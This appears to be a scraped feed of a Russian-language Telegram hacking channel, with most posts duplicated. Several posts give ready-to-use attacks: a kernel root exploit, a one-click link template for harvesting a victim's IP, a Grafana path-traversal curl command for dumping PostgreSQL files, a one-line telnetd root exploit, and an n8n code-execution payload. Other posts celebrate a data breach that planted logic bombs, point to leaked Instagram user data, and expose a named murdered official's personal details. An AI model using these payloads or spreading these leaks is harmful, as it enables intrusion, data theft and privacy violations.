А я напоминаю ☝️: в преддверии ❄️Нового года❄️ некоторые снова начнут распространять свой псиоп📡 против Санты🎅.
Прошу подписчиков быть бдительными 😀 Не поддавайтесь дезинформации в интернете о том, что Санта🎅 «якобы» не существует 😉
Пишите письма📨 Санте🎅, верьте в новогоднее чудо🤲 и не забудьте оставить печенье🍪 и тёплое молоко🥛 под ёлочкой🌲.
Всех с наступающим праздником, любимые подписчики 🎁✨
Прошу подписчиков быть бдительными 😀 Не поддавайтесь дезинформации в интернете о том, что Санта🎅 «якобы» не существует 😉
Пишите письма📨 Санте🎅, верьте в новогоднее чудо🤲 и не забудьте оставить печенье🍪 и тёплое молоко🥛 под ёлочкой🌲.
Всех с наступающим праздником, любимые подписчики 🎁✨
This media is not supported in your browser
VIEW IN TELEGRAM
https://github.com/farazsth98/chronomaly
chronomaly — Kernel LPE exploit для CVE-2025-38352. Работает как на Linux, так и на Android, — полноценный root на всех версиях ядра
Более подробно:
— Part 1 - In-the-wild Android Kernel Vulnerability Analysis + PoC
— Part 2 - Extending The Race Window Without a Kernel Patch
— Part 3 - Uncovering Chronomaly
chronomaly — Kernel LPE exploit для CVE-2025-38352. Работает как на Linux, так и на Android, — полноценный root на всех версиях ядра
5.10.x.Более подробно:
— Part 1 - In-the-wild Android Kernel Vulnerability Analysis + PoC
— Part 2 - Extending The Race Window Without a Kernel Patch
— Part 3 - Uncovering Chronomaly
Malwarebytes сообщает, что слили Instagram
Украли инфу о 17.5 млн. учетках (!), включая:
— имена пользователей
— юзернеймы
— емейлы
— номера телефонов
— примерное местоположение
Не смотря на то, что данные получены с помощью парсинга в 2024 году, пользователи в комментах уже сообщают о том, что у них начали угонять аккаунты.
Ссылку на скачивание автор оставил тут.
Украли инфу о 17.5 млн. учетках (!), включая:
— имена пользователей
— юзернеймы
— емейлы
— номера телефонов
— примерное местоположение
Не смотря на то, что данные получены с помощью парсинга в 2024 году, пользователи в комментах уже сообщают о том, что у них начали угонять аккаунты.
Ссылку на скачивание автор оставил тут.
This media is not supported in your browser
VIEW IN TELEGRAM
Нашли простой способ, как можно слить IP-адрес у ничего не подозревающего собеседника в Telegram, в один клик.
Пошагово:
1. Поднимаем mitmproxy или другой listener
2. Пишем любой текст и указываем ссылку
3. Ждем, пока по ней кликнут, и сразу же получаем IP
Работает на iOS и Android, благодаря "автопингу" прокси. Плюс метода в том, что подвержены как старые, так и новые клиенты, а главное — никакого предупреждения о раскрытии IP при клике по замаскированной ссылке.
Пошагово:
1. Поднимаем mitmproxy или другой listener
2. Пишем любой текст и указываем ссылку
t.me/proxy?server=<LISTENER_IP>&port=<LISTENER_PORT>&secret=random3. Ждем, пока по ней кликнут, и сразу же получаем IP
Работает на iOS и Android, благодаря "автопингу" прокси. Плюс метода в том, что подвержены как старые, так и новые клиенты, а главное — никакого предупреждения о раскрытии IP при клике по замаскированной ссылке.
Secrets Patterns Database
Пользователь с ником mazen160 собрал самую большую базу данных для поиска секретов. Она насчитывает более 1600 регулярок и позволяет находить API-ключи, токены, и пароли, которые часто остаются незамеченными.
Для сравнения, у одного из самых популярных сканеров секретов GitLeaks всего 60 правил. В комплекте идет скрипт, которые позволяет конвертировать правила для него и других тулов.
Пользователь с ником mazen160 собрал самую большую базу данных для поиска секретов. Она насчитывает более 1600 регулярок и позволяет находить API-ключи, токены, и пароли, которые часто остаются незамеченными.
Для сравнения, у одного из самых популярных сканеров секретов GitLeaks всего 60 правил. В комплекте идет скрипт, которые позволяет конвертировать правила для него и других тулов.
1
Взлом LADA
Группа 4BID слила компанию "Брайт Парк" — сеть официальных автосалонов LADA, которая работает в 6 российских городах, включая Москву.
Под удар попали
В результате теперь всем доступны данные более 1млн. покупателей, среди которых:
— ФИО
— номер телефона
— электронная почта
— хэши паролей
— адрес проживания
— данные о работе (стаж, доход)
— паспортные данные
— контакты
Из забавного — один из админов в процессе инцидента просто ушел спать, в то время, как у другого нашли огромную коллекцию "жесткой клубники"
Группа 4BID слила компанию "Брайт Парк" — сеть официальных автосалонов LADA, которая работает в 6 российских городах, включая Москву.
Под удар попали
— 22 сервера Proxmox;
— 22 NAS-хранилища с общим объёмом ~100 ТБ данных (всё вкусное — выгружено);
— Все UNIX-системы (заминированы логическими бомбами — саперам привет);
— Домен Active Directory на ~800 машин;
В результате теперь всем доступны данные более 1млн. покупателей, среди которых:
— ФИО
— номер телефона
— электронная почта
— хэши паролей
— адрес проживания
— данные о работе (стаж, доход)
— паспортные данные
— контакты
Из забавного — один из админов в процессе инцидента просто ушел спать, в то время, как у другого нашли огромную коллекцию "жесткой клубники"
Там огромная коллекция «клубники»: русскоязычное домашнее и любительское, жёсткие сцены, рипы с LegalPorno/EvilAngel/Tushy, плюс в других папках старая зоо-коллекция. Файлы с 2006 по 2024, всё в куче, активно раздаётся через uTorrent.
Дампим PostgreSQL с помощью Path Traversal
Наткнулся на гайд то, как восстановить "убитую" базу данных PostgreSQL. Его суть сводится к тому, что все данные лежат на файловой системе, и все можно довольно легко раскрутить от главного файла
Его идентификатор (
А затем, с помощью него и двух бинарей с отношениями и типами данных,
С помощью pg_filedump
или специальной утилиты pgread, которая автоматизирует рутину
Что самое главное — не понадобились никакие креды, чтобы сдампить базу.
Наткнулся на гайд то, как восстановить "убитую" базу данных PostgreSQL. Его суть сводится к тому, что все данные лежат на файловой системе, и все можно довольно легко раскрутить от главного файла
global/1262 (pg_database).Его идентификатор (
oid) всегда статический, и это удобно — можно легко достать с помощью Path Traversal. Вот так, на примере CVE-2021-43798 в Grafana:curl --path-as-is -O http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../var/lib/postgresql/data/global/1262
А затем, с помощью него и двух бинарей с отношениями и типами данных,
base/<db_oid>/1259 и base/<db_oid>/1249 (у каждой базы свой db_oid, его можно достать из pg_database), легко восстановить и содержимое всей базы данных. С помощью pg_filedump
./pg_filedump -D int,bool,text,timestamp /path/to/db/base/16384/16393
или специальной утилиты pgread, которая автоматизирует рутину
./pgread -passwords all
PostgreSQL Password Hashes:
===========================
pg_database_owner:(no password)
admin:SCRAM-SHA-256$4096:salt$hash:proof [SUPERUSER] [LOGIN]
Что самое главное — не понадобились никакие креды, чтобы сдампить базу.
GitHub
GitHub - Chocapikk/pgread: Read PostgreSQL data files without credentials - forensics, data recovery, and security research tool
Read PostgreSQL data files without credentials - forensics, data recovery, and security research tool - Chocapikk/pgread
Еще даже не успели присвоить CVE
В
Под ударом практически все дистрибутивы Linux, которые ставят
— Debian / Ubuntu / Kali / Trisquel и производные
— Многие embedded-системы, старые роутеры, IoT-устройства, промышленные контроллеры, где до сих пор жив telnet
Shodan сейчас находит 732,350 устройств по всему миру.
А чтобы эксплуатировать, достаточно одной команды:
UPD.: присвоили https://nvd.nist.gov/vuln/detail/CVE-2026-24061
В
telnetd начиная с версии 1.9.3 (май 2015 года) и вплоть до 2.7 (включительно) существует уязвимость, которая позволяет любому подключиться от имени root, без проверки пароля.Под ударом практически все дистрибутивы Linux, которые ставят
inetutils-telnetd из репозиториев:— Debian / Ubuntu / Kali / Trisquel и производные
— Многие embedded-системы, старые роутеры, IoT-устройства, промышленные контроллеры, где до сих пор жив telnet
Shodan сейчас находит 732,350 устройств по всему миру.
А чтобы эксплуатировать, достаточно одной команды:
$ USER="-f root" telnet -a IP PORT
UPD.: присвоили https://nvd.nist.gov/vuln/detail/CVE-2026-24061
Это Кира, только без тетради
Прямо в проходной здания Роскомнадзора в Москве убит высокопоставленный сотрудник ведомства Алексей Беляев — он отвечал за блокировки сайтов и замедление трафика.
Убийство произошло 19 января: 16-летний школьник Артём ударил чиновника ножом в грудь, когда тот выходил из офиса.
Беляев работал в Роскомнадзоре больше 10 лет, на момент смерти — замначальника отдела контроля и надзора в сфере связи. Этот отдел отвечает за:
— установку и контроль «чёрных ящиков» (ТСПУ), через которые РКН напрямую блокирует YouTube, Discord, VPN и т.д.;
— мониторинг фильтрации трафика и штрафы провайдерам, если запрещённые сайты всё же открываются;
— поиск и блокировку зеркал заблокированных ресурсов;
— замедление трафика для ещё не полностью заблокированных сайтов;
Серия и номер паспорта стали недействительны 19 января 2026 года (в день смерти), а зарплата сотрудника, согласно утечкам, составляла 135 тысяч рублей в месяц.
Прямо в проходной здания Роскомнадзора в Москве убит высокопоставленный сотрудник ведомства Алексей Беляев — он отвечал за блокировки сайтов и замедление трафика.
Убийство произошло 19 января: 16-летний школьник Артём ударил чиновника ножом в грудь, когда тот выходил из офиса.
Беляев работал в Роскомнадзоре больше 10 лет, на момент смерти — замначальника отдела контроля и надзора в сфере связи. Этот отдел отвечает за:
— установку и контроль «чёрных ящиков» (ТСПУ), через которые РКН напрямую блокирует YouTube, Discord, VPN и т.д.;
— мониторинг фильтрации трафика и штрафы провайдерам, если запрещённые сайты всё же открываются;
— поиск и блокировку зеркал заблокированных ресурсов;
— замедление трафика для ещё не полностью заблокированных сайтов;
Серия и номер паспорта стали недействительны 19 января 2026 года (в день смерти), а зарплата сотрудника, согласно утечкам, составляла 135 тысяч рублей в месяц.
Как не потерять все
Есть железная схема с тремя копиями:
1. Рабочая (которую используешь каждый день)
2. Локальная (чтобы быстро восстановиться)
3. Удалённая (если сгорела хата)
Хранишь все свои данные на ПК, синкаешь самое важное с NAS или просто внешним диском, и отдельно выгружаешь в облако.
Но какое облако выбрать? В таблице собраны все облачные хранилища, у которых есть lifetime-подписка — один раз платишь и получаешь доступ на всю жизнь.
У каждого есть свои нюансы, — один говорит о "пожизненном доступе" компании, а не тебя, другой удалит все твои файлы через 3 года, если туда не заходить. Здесь все описано, как и самые надежные сервисы, которые выделены зеленым.
Советую сохранить пост, чтобы не потерять. Окупается такое облако примерно за 5 лет, а перед выгрузкой нужно не забыть все зашифровать, например, с помощью Cryptomator.
Есть железная схема с тремя копиями:
1. Рабочая (которую используешь каждый день)
2. Локальная (чтобы быстро восстановиться)
3. Удалённая (если сгорела хата)
Хранишь все свои данные на ПК, синкаешь самое важное с NAS или просто внешним диском, и отдельно выгружаешь в облако.
Но какое облако выбрать? В таблице собраны все облачные хранилища, у которых есть lifetime-подписка — один раз платишь и получаешь доступ на всю жизнь.
У каждого есть свои нюансы, — один говорит о "пожизненном доступе" компании, а не тебя, другой удалит все твои файлы через 3 года, если туда не заходить. Здесь все описано, как и самые надежные сервисы, которые выделены зеленым.
Советую сохранить пост, чтобы не потерять. Окупается такое облако примерно за 5 лет, а перед выгрузкой нужно не забыть все зашифровать, например, с помощью Cryptomator.
3
🔥 [10/10] CVE-2026-25049: RCE в n8n
Это обход для всех предыдущих патчей. Уязвимость позволяет выполнять произвольные команды на сервере.
Уязвимы версии:
— <1.123.17 (исправлено в 1.123.17)
— <2.5.2 (исправлено в 2.5.2)
PoC
1. Создаем workflow
2. Добавляем Edit Field
3. Указываем в String (Expression)
4. Нажимаем Execute Step
Это обход для всех предыдущих патчей. Уязвимость позволяет выполнять произвольные команды на сервере.
Уязвимы версии:
— <1.123.17 (исправлено в 1.123.17)
— <2.5.2 (исправлено в 2.5.2)
PoC
1. Создаем workflow
2. Добавляем Edit Field
3. Указываем в String (Expression)
{{(() => {
const { [`constr${'uct'}or`]: Fn } = Object;
const payload = "return process.mainModule.require('child_process').execSync('cat /etc/passwd').toString();";
return Fn(payload)();
})()}}4. Нажимаем Execute Step
1
Надо было пользоваться гарантом
Сын Павла Дурова, Миша, решил по-своему отметить день безопасного интернета — заскамил трёх человек в телеге, среди которых был и админ одного из каналов.
Все началось с того, что 16-летний Миша написал первым и предложил купить у него подарок "Кепку Дурова", мол, она ему больше не нужна.
В качестве пруфов показал фотку с Хабибом, прислал кружок, где сидит рядом с основателем Telegram, и отправил пару голосовых, в которых уверял, что он не скамер:
В итоге парень доверился и отправил $700 за кепку, после чего продавец сразу же кинул его в бан.
Когда история разлетелась, на аккаунт Миши начали массово жаловаться, и повесили метку «скам». Дошло все до того, что Павел Дуров вмешался сам и компенсировал ущерб, лично отправил пострадавшему такую же кепку.
Сын Павла Дурова, Миша, решил по-своему отметить день безопасного интернета — заскамил трёх человек в телеге, среди которых был и админ одного из каналов.
Все началось с того, что 16-летний Миша написал первым и предложил купить у него подарок "Кепку Дурова", мол, она ему больше не нужна.
В качестве пруфов показал фотку с Хабибом, прислал кружок, где сидит рядом с основателем Telegram, и отправил пару голосовых, в которых уверял, что он не скамер:
Брат, да если моему пахану придёт репорт, что я скамлю людей в телеге, мне просто пизда будет. Я не могу так, брат. Не то что, блять, не знаю, ремнём попиздит, а просто в Дагестан на всю жизнь — я этого боюсь сильно.
В итоге парень доверился и отправил $700 за кепку, после чего продавец сразу же кинул его в бан.
Когда история разлетелась, на аккаунт Миши начали массово жаловаться, и повесили метку «скам». Дошло все до того, что Павел Дуров вмешался сам и компенсировал ущерб, лично отправил пострадавшему такую же кепку.